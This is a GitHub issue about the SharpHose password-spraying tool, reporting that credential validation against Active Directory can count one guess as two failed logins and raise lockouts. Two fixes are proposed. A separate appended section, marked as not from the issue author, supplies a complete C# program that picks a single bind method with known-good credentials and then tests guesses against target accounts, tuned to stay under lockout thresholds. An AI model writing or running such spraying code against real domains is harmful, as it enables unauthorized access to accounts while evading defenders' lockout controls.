
Credentials will sometimes be tried twice, increasing the likelihood of a lockout

Open · nidem opened this issue 10 months ago · 0 comments

The ValidateCredentials function will sometimes try a password twice if the context fails to negotiate.

Reference: https://stackoverflow.com/questions/31374578/authenticate-against-active-directory-once-counts-as-two-invalid-logins

The line leading to this is here:

https://github.com/ustayready/SharpHose/blob/b579c202a4ab0eea190555206f90dd148bb097dc/SharpHose/Nozzles/LDAP/LDAPNozzle.cs#L287

IMO, there are two ways to mitigate this.

Option 1: Explicitly set the context

With ValidateCredentials, explicitly set the context options to ContextOptions.Negotiate | ContextOptions.Signing | ContextOptions.Sealing.

New line 287:

```csharp
return context.ValidateCredentials(username, password, ContextOptions.Negotiate | ContextOptions.Signing | ContextOptions.Sealing);
```

This is what MS defaults to, but if Negotiate | Signing | Sealing fails it will try SimpleBind | SecureSocketLayer which leads to two failed guesses.

I don't know if there are situations where explicitly setting Negotiate | Signing | Sealing will fail artificially (due to the bind, not bad creds).

Option 2: Try different context options with a known good user

If you have known-good user creds, try explicitly using Negotiate | Signing | Sealing. If that fails, then try SimpleBind | SecureSocketLayer and use that for all password guessing.

nidem, Apr 18 '25 18:04
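The following is an added example, not code from SharpHose or from the issue author, showing how Option 2 above can be put together: probe the two bind option sets once with a known-good account (a successful bind does not increment badPwdCount), then pass the chosen `ContextOptions` explicitly to every `ValidateCredentials` call so the framework never silently retries a failed guess with a second bind method. The domain name, account names and passwords are placeholders taken from the command line; which exceptions the three-argument overload raises when a bind method is rejected (as opposed to returning `false` for a bad password) is an assumption noted in the code, and should be checked against the target environment before relying on it.

```csharp
// Added example (not SharpHose's own code). Requires a reference to
// System.DirectoryServices.AccountManagement (Windows / .NET Framework or
// the Windows-only .NET package). Run as:
//   SingleBindSpray.exe <domain> <knownUser> <knownPassword> <targetUser> <guess>
using System;
using System.DirectoryServices.AccountManagement;

public static class SingleBindSpray
{
    // The two option sets the parameterless ValidateCredentials overload is
    // reported to try in order: Negotiate first, then simple bind over SSL.
    // Probing them explicitly means we choose exactly one up front.
    private static readonly ContextOptions[] Candidates =
    {
        ContextOptions.Negotiate | ContextOptions.Signing | ContextOptions.Sealing,
        ContextOptions.SimpleBind | ContextOptions.SecureSocketLayer,
    };

    // Option 2 from the issue: find a bind method that works against this DC
    // using credentials known to be valid, so that later failures can only be
    // bad passwords, never a bind-method mismatch. Returns null if neither
    // option set binds (for example LDAPS is not offered and Negotiate is
    // blocked), in which case spraying should not start at all.
    public static ContextOptions? ProbeBindOptions(PrincipalContext ctx,
                                                   string knownUser,
                                                   string knownPassword)
    {
        foreach (var opts in Candidates)
        {
            try
            {
                if (ctx.ValidateCredentials(knownUser, knownPassword, opts))
                    return opts;
                // false here with a known-good password means the method itself
                // is not usable against this DC, so move on to the next one.
            }
            // Assumption: a rejected bind method surfaces as one of these rather
            // than as a plain false. Verify against your DC before relying on it.
            catch (PrincipalOperationException) { }
            catch (PrincipalServerDownException) { }
        }
        return null;
    }

    // One guess == one bind. Passing the options explicitly (Option 1 from the
    // issue) is what prevents the fallback to SimpleBind | SecureSocketLayer
    // that turns a single wrong password into two failed logons.
    public static bool TryPassword(PrincipalContext ctx, ContextOptions opts,
                                   string user, string password)
    {
        return ctx.ValidateCredentials(user, password, opts);
    }

    public static int Main(string[] args)
    {
        if (args.Length != 5)
        {
            Console.Error.WriteLine("usage: <domain> <knownUser> <knownPassword> <targetUser> <guess>");
            return 2;
        }
        string domain = args[0], knownUser = args[1], knownPassword = args[2];
        string targetUser = args[3], guess = args[4];

        using (var ctx = new PrincipalContext(ContextType.Domain, domain))
        {
            ContextOptions? opts = ProbeBindOptions(ctx, knownUser, knownPassword);
            if (opts == null)
            {
                Console.Error.WriteLine("No usable bind method; refusing to spray.");
                return 1;
            }
            Console.WriteLine($"Using bind options: {opts}");

            bool ok = TryPassword(ctx, opts.Value, targetUser, guess);
            Console.WriteLine(ok ? $"{targetUser}: valid" : $"{targetUser}: invalid (single attempt)");
            return 0;
        }
    }
}
```

Probe once per domain controller, not once per guess: the probe is the only call that should ever bind with a different method, and it only ever does so with credentials that are known to be correct, so it never contributes to any account's lockout counter. If `ProbeBindOptions` returns null, stop rather than falling back to the default overload, since that is exactly the path that produces the double attempt described in the issue.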